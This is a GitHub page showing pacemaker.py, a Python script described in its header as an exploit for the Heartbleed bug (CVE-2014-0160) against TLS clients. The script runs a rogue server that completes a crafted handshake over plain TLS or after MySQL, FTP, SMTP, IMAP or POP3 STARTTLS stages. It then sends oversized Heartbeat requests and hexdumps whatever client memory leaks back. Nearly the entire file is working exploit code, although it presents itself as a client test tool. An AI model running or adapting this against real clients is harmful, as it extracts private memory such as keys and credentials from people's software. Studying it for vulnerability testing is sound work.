-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathpacemaker.py
executable file
·304 lines (259 loc) · 11 KB
/
pacemaker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
#!/usr/bin/env python
# Exploitation of CVE-2014-0160 Heartbeat for the client
# Author: Peter Wu <peter@lekensteyn.nl>
try:
import socketserver
except:
import SocketServer as socketserver
import socket
import sys
import struct
import select, time
from argparse import ArgumentParser
# Command-line interface. The parser is only built here; the arguments are
# parsed in the ``__main__`` guard at the bottom of the file.
parser = ArgumentParser(
    description='Test clients for Heartbleed (CVE-2014-0160)')
parser.add_argument(
    '-6', '--ipv6', action='store_true',
    help='Enable IPv6 addresses (implied by IPv6 listen addr. such as ::)')
parser.add_argument(
    '-l', '--listen', default='',
    help='Host to listen on (default "%(default)s")')
parser.add_argument(
    '-p', '--port', type=int, default=4433,
    help='TCP port to listen on (default %(default)d)')
# Note: 'ftp' means Explicit FTPS. Use 'tls' for Implicit FTPS.
parser.add_argument(
    '-c', '--client', default='tls',
    choices=['tls', 'mysql', 'ftp', 'smtp', 'imap', 'pop3'],
    help='Target client type (default %(default)s)')
parser.add_argument(
    '-t', '--timeout', type=int, default=3,
    help='Timeout in seconds to wait for a Heartbeat (default %(default)d)')
parser.add_argument(
    '--skip-server', default=False, action='store_true',
    help='Skip ServerHello, immediately write Heartbeat request')
parser.add_argument(
    '-x', '--count', type=int, default=1,
    help='Number of Heartbeat requests to be sent (default %(default)d)')
def make_hello(sslver, cipher):
    """Build the ServerHello record announcing the Heartbeat extension.

    sslver -- protocol version as two hex bytes separated by a space,
              e.g. '03 01'; it is inserted into both the record header and
              the handshake body.
    cipher -- iterable of integers; each one is rendered as a two-digit hex
              byte and placed where the selected cipher suite goes.

    Returns the whole record as a bytearray.
    """
    # Record header: content type 0x16 (Handshake), version, record length
    record_header = '16 ' + sslver + ' 00 31'
    # Handshake header: '02 00' followed by the handshake length, then the
    # version once more as the first field of the handshake body
    handshake_header = ' 02 00' + ' 00 2d' + ' ' + sslver
    # 32 fixed bytes followed by a single 00 byte. The newlines are part of
    # the literal and are stripped again before hex decoding.
    fixed_blob = (
        '\n'
        '52 34 c6 6d 86 8d e8 40 97 da\n'
        'ee 7e 21 c4 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7\n'
        '95 8c 33 42 3f d5 00\n'
    )
    cipher_hex = ' '.join('{:02x}'.format(octet) for octet in cipher)
    trailer = ''.join((
        ' 00',     # No compression
        ' 00 05',  # Extensions length
        # Heartbeat extension
        ' 00 0f',  # Heartbeat type
        ' 00 01',  # Length
        ' 01',     # mode
    ))
    hex_text = (record_header + handshake_header + fixed_blob
                + cipher_hex + trailer)
    return bytearray.fromhex(hex_text.replace('\n', ''))
def make_heartbeat(sslver):
    """Build a Heartbeat request record that claims a 0xffff byte payload.

    sslver -- protocol version as two hex bytes separated by a space,
              e.g. '03 01'.

    Returns the record as a bytearray. Only the three header bytes of the
    Heartbeat message are included; no payload follows the announced length.
    """
    fields = (
        '18 ' + sslver,  # Record: content type 0x18 plus version
        ' 00 03',        # Length
        ' 01',           # Type: Request
        ' ff ff',        # Payload Length
    )
    return bytearray.fromhex(''.join(fields).replace('\n', ''))
def hexdump(data):
    """Print a hex and ASCII dump of ``data`` to stdout, 16 bytes per line.

    data -- a bytes-like sequence that yields integers when iterated
            (e.g. a bytearray).

    Consecutive all-zero lines are collapsed: the first line of a run is
    printed, the second is replaced by a single "*" and the rest of the run
    is omitted. The run counter is reset at the next non-zero line, so zero
    lines that appear later in the dump are shown (and collapsed) again
    instead of being dropped without any marker.
    """
    allzeroes = b'\0' * 16
    zerolines = 0
    for i in range(0, len(data), 16):
        line = data[i:i+16]
        if line == allzeroes:
            zerolines += 1
            if zerolines == 2:
                print("*")
            if zerolines >= 2:
                continue
        else:
            # A non-zero line ends the current run of zero lines
            zerolines = 0
        print("{:04x}: {:47} {}".format(
            i,
            ' '.join('{:02x}'.format(c) for c in line),
            ''.join(chr(c) if 32 <= c < 127 else '.' for c in line)))
class Failure(Exception):
    """Raised when a check on the traffic received from a client fails."""
class RequestHandler(socketserver.BaseRequestHandler):
    """Handle one client connection and probe it with Heartbeat requests.

    The handler optionally runs a protocol-specific ``prepare_<client>``
    stage, answers the ClientHello with a ServerHello and then sends
    ``args.count`` Heartbeat requests, dumping whatever the client returns.
    """

    def handle(self):
        """Run the complete test against the connected client.

        Failures while talking to the client are reported on stdout rather
        than raised. A KeyboardInterrupt additionally stops the server.
        """
        self.args = self.server.args
        self.sslver = '03 01'  # default to TLSv1.0
        remote_addr, remote_port = self.request.getpeername()[:2]
        print("Connection from: {}:{}".format(remote_addr, remote_port))

        try:
            # Set timeout to prevent hang on clients that send nothing
            self.request.settimeout(2)
            prep_meth = 'prepare_' + self.args.client
            if hasattr(self, prep_meth):
                getattr(self, prep_meth)(self.request)
                print('Pre-TLS stage completed, continuing with handshake')

            if not self.args.skip_server:
                self.do_serverhello()

            for i in range(0, self.args.count):
                try:
                    self.do_evil()
                except OSError as e:
                    if i == 0:  # First heartbeat?
                        print('Unable to send first heartbeat! ' + str(e))
                    else:
                        print('Unable to send more heartbeats, ' + str(e))
                    break
        except (Failure, OSError, socket.timeout, UnicodeDecodeError) as e:
            # UnicodeDecodeError: a text-protocol client sent non-ASCII bytes
            print('Unable to check for vulnerability: ' + str(e))
        except KeyboardInterrupt:
            # Don't just abort this client, stop the server too
            print('Shutting down...')
            self.server.kill()

        print('')

    def do_serverhello(self):
        """Read the ClientHello and reply with a matching ServerHello.

        The protocol version and the first offered cipher are copied from
        the ClientHello; the version is remembered in ``self.sslver``.
        Raises Failure when the received data is not a usable ClientHello.
        """
        # Read TLS record header
        content_type, ver, rec_len = self.recv_s('>BHH', 'TLS record')
        # Check the type before the length: for an SSLv2 hello the bytes
        # read as ``rec_len`` are not a record length at all.
        if content_type == 0x80:  # SSLv2 (assume length < 256)
            raise Failure('SSL 2.0 clients cannot be tested')
        self.expect(content_type == 22, 'Expected Handshake type')
        # Session-ID length (1 byte) starts at offset 38
        self.expect(rec_len >= 39, 'Illegal handshake packet')

        # Read handshake (may arrive in several TCP segments)
        hnd = self._recv_exact(rec_len)
        self.expect(len(hnd) == rec_len, 'Unable to read handshake')
        hnd_type, len_high, len_low, ver = struct.unpack('>BBHH', hnd[:6])
        self.expect(hnd_type == 1, 'Expected Client Hello')
        # hnd[6:6+32] is Random
        off = 6 + 32
        sid_len, = struct.unpack('B', hnd[off:off+1])
        off += 1 + sid_len  # Skip length and SID
        # Enough room for ciphers?
        self.expect(rec_len - off >= 4, 'Illegal handshake packet (2)')
        off += 2  # Skip the cipher suites length field
        # The first cipher is fine...
        cipher = bytearray(hnd[off:off+2])

        self.sslver = '{:02x} {:02x}'.format(ver >> 8, ver & 0xFF)

        # (1) Handshake: ServerHello
        self.request.sendall(make_hello(self.sslver, cipher))

        # (skip Certificate, etc.)

    def do_evil(self):
        """Send one Heartbeat request and report what the client returns."""
        # (2) HeartbeatRequest
        self.request.sendall(make_heartbeat(self.sslver))

        # (3) Buggy OpenSSL will throw 0xffff bytes, fixed ones stay silent
        if not self.read_memory(self.request, self.args.timeout):
            print("Possibly not vulnerable")

    def read_memory(self, sock, timeout):
        """Collect the reply to a Heartbeat request and print it.

        sock    -- socket to read from.
        timeout -- total number of seconds to wait for data.

        Reading stops after 0xffff bytes, on EOF, on a socket error or when
        the timeout expires. Returns 7 when the reply is a 7-byte Alert
        record, otherwise True if any data was received and False if not.
        """
        end_time = time.time() + timeout
        buffer = bytearray()
        wanted_bytes = 0xffff

        while wanted_bytes > 0 and timeout > 0:
            rl, _, _ = select.select([sock], [], [], timeout)
            if not rl:
                break

            try:
                data = rl[0].recv(wanted_bytes)
            except socket.error as e:
                if not len(buffer):
                    print('Did not receive heartbeat response! ' + str(e))
                break  # Connection reset?
            if not data:  # EOF
                break
            buffer += data
            wanted_bytes -= len(data)
            timeout = end_time - time.time()

        # Check for Alert (sent by NSS)
        alert = bytearray.fromhex('15 ' + self.sslver + ' 00 02')
        if len(buffer) == 7 and buffer[0:5] == alert and buffer[5] in (1, 2):
            lvl = 'Warning' if buffer[5] == 1 else 'Fatal'
            print('Got Alert, level=' + lvl +
                  ', description=' + str(buffer[6]))
            print('Not vulnerable! (Heartbeats disabled or not OpenSSL)')
            return 7

        if len(buffer) > 0:
            print('Client returned {0} ({0:#x}) bytes'.format(len(buffer)))
            hexdump(buffer)

        return len(buffer) > 0

    def expect(self, cond, what):
        """Raise Failure with message ``what`` unless ``cond`` is true."""
        if not cond:
            raise Failure(what)

    def prepare_mysql(self, sock):
        """Send a MySQL server greeting and consume the client's SSLRequest.

        Raises Failure if the reply is not a 32-byte packet with the
        0x800 capability bit set.
        """
        # This was taken from a MariaDB client. For reference, see
        # https://dev.mysql.com/doc/internals/en/connection-phase-packets.html#packet-Protocol::Handshake
        greeting = '''
        56 00 00 00 0a 35 2e 35 2e 33 36 2d 4d 61 72 69
        61 44 42 2d 6c 6f 67 00 04 00 00 00 3d 3b 4e 57
        4c 54 44 35 00 ff ff 21 02 00 0f e0 15 00 00 00
        00 00 00 00 00 00 00 7c 36 33 3f 23 2e 5e 6d 2d
        34 5c 54 00 6d 79 73 71 6c 5f 6e 61 74 69 76 65
        5f 70 61 73 73 77 6f 72 64 00
        '''
        sock.sendall(bytearray.fromhex(greeting.replace('\n', '')))
        print("Server Greeting sent.")

        # Header: 3-byte little-endian length (read as 1 + 2 bytes), a
        # sequence id byte, then the first two bytes of the packet (caps)
        len_low, len_high, seqid, caps = self.recv_s('<BHBH',
                                                     'MySQL handshake')
        packet_len = (len_high << 8) | len_low
        self.expect(packet_len == 32, 'Expected SSLRequest length == 32')
        self.expect((caps & 0x800), 'Missing Client SSL support')

        print("Skipping {} packet bytes...".format(packet_len))
        # Skip remainder (minus 2 for caps) to prepare for SSL handshake.
        # Read it completely so no leftover bytes precede the ClientHello.
        self._recv_exact(packet_len - 2)

    def prepare_ftp(self, sock):
        """Greet an FTP client and accept its AUTH SSL / AUTH TLS command."""
        sock.sendall('220 pacemaker test\r\n'.encode('ascii'))
        data = sock.recv(16).decode('ascii').strip()
        self.expect(data in ('AUTH SSL', 'AUTH TLS'),
                    'Unexpected response: ' + data)
        sock.sendall(bytearray('234 ' + data + '\r\n', 'ascii'))

    def prepare_pop3(self, sock):
        """Run the POP3 CAPA / STLS exchange that precedes the handshake."""
        self.do_conversation('+OK pacemaker ready\r\n', [
            ('CAPA', '+OK\r\nSTLS\r\n.\r\n'),
            ('STLS', '+OK\r\n')
        ])

    def prepare_smtp(self, sock):
        """Run the SMTP EHLO / STARTTLS exchange that precedes the handshake."""
        self.do_conversation('220 pacemaker test\r\n', [
            ('EHLO ', '250-example.com Hi!\r\n250 STARTTLS\r\n'),
            ('STARTTLS', '220 Go ahead\r\n')
        ])

    def prepare_imap(self, sock):
        """Run the IMAP CAPABILITY / STARTTLS exchange before the handshake.

        Each client command must be '<tag> <command>'; the command is
        matched case-insensitively and the tag is echoed back exactly as
        the client sent it. Raises Failure on an unexpected command.
        """
        talk = [
            ('CAPABILITY', '* CAPABILITY STARTTLS\r\n'),
            ('STARTTLS', '')
        ]
        sock.sendall('* OK\r\n'.encode('ascii'))
        for exp, resp in talk:
            raw = sock.recv(256).decode('ascii')
            data = raw.upper()
            self.expect(' ' in data, 'IMAP protocol violation, got ' + data)
            # Split only once so that command arguments stay with the
            # command, and take the tag from the unmodified input.
            tag = raw.split(' ', 1)[0]
            data = data.split(' ', 1)[1]
            self.expect(data[:len(exp)] == exp,
                        'Expected ' + exp + ', got ' + data)
            resp += tag + ' OK\r\n'
            sock.sendall(resp.encode('ascii'))

    def do_conversation(self, greeting, talk):
        '''Helper to handle simple request-response protocols.

        greeting -- text sent to the client first.
        talk     -- sequence of (expected_prefix, response) pairs; each
                    client message is upper-cased and must start with
                    expected_prefix, otherwise Failure is raised.
        '''
        self.request.sendall(greeting.encode('ascii'))

        for exp, resp in talk:
            data = self.request.recv(256).decode('ascii').upper()
            self.expect(data[:len(exp)] == exp,
                        'Expected ' + exp + ', got ' + data)
            self.request.sendall(resp.encode('ascii'))

    def recv_s(self, struct_def, what):
        """Read and unpack one fixed-size structure from the client.

        struct_def -- ``struct`` format string describing the data.
        what       -- description used in the error message.

        Returns the unpacked tuple. Raises Failure if the connection ends
        before all bytes arrived.
        """
        s = struct.Struct(struct_def)
        data = self._recv_exact(s.size)
        msg = '{}: received only {}/{} bytes'.format(what, len(data), s.size)
        self.expect(len(data) == s.size, msg)
        return s.unpack(data)

    def _recv_exact(self, size):
        """Read ``size`` bytes from the client, looping over short reads.

        Returns fewer than ``size`` bytes only if the client closed the
        connection first; callers check the length themselves.
        """
        chunks = []
        remaining = size
        while remaining > 0:
            chunk = self.request.recv(remaining)
            if not chunk:  # EOF
                break
            chunks.append(chunk)
            remaining -= len(chunk)
        return b''.join(chunks)
class PacemakerServer(socketserver.TCPServer):
    """TCP server that passes each connection to RequestHandler.

    The parsed command-line arguments are kept in ``self.args`` where the
    handler reads them. The serving loop runs until kill() is called.
    """

    def __init__(self, args):
        """Create the listening socket on ``args.listen``:``args.port``."""
        # Both attributes must be set before the base constructor runs
        self.allow_reuse_address = True
        wants_ipv6 = args.ipv6 or ':' in args.listen
        if wants_ipv6:
            self.address_family = socket.AF_INET6
        socketserver.TCPServer.__init__(
            self, (args.listen, args.port), RequestHandler)
        self.args = args

    def serve_forever(self):
        """Handle one request at a time until kill() has been called."""
        self.stopped = False
        while True:
            if self.stopped:
                break
            self.handle_request()

    def kill(self):
        """Ask the serve_forever() loop to stop before the next request."""
        self.stopped = True
def serve(args):
    """Announce the listen address and serve clients until stopped.

    args -- parsed command-line arguments; ``listen``, ``port`` and
            ``client`` are printed and the whole object is handed to
            PacemakerServer.
    """
    banner = 'Listening on {}:{} for {} clients'
    print(banner.format(args.listen, args.port, args.client))
    PacemakerServer(args).serve_forever()
# Script entry point: parse the command line and run the server.
if __name__ == '__main__':
    args = parser.parse_args()
    try:
        serve(args)
    except KeyboardInterrupt:
        # Ctrl-C while serving: exit without printing a traceback
        pass